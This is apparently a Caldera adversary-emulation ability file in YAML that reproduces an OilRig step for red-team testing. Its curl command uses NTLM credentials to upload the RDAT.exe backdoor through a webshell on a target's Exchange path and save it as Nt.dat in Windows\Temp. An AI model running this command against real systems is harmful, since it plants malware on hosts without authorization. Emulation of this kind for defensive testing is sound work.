ability_id: d5b83af2-b79e-438d-acfc-2641282df698
access: {}
additional_info: {}
buckets:
- command-and-control
delete_payload: true
description: OilRig uses the webshell to download RDAT as nt.dat to WATERFALLS
executors:
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: curl -s --http1.1 --ntlm -u '#{network.domain.name}\#{initial.target.user}:#{initial.target.password}'
    -k -X POST -F "upl=f1" -F 'sav=C:\Windows\Temp' -F "vir=false" -F "nen=Nt.dat"
    -F 'f1=@RDAT.exe' https://#{second.target.host}/ews/contact.aspx
  language: null
  name: sh
  parsers: []
  payloads:
  - RDAT.exe
  platform: linux
  timeout: 60
  uploads: []
  variations: []
name: OilRig Downloads RDAT
plugin: emu
privilege: ''
repeatable: false
requirements: []
singleton: false
tactic: command-and-control
technique_id: T1105
technique_name: Ingress Tool Transfer
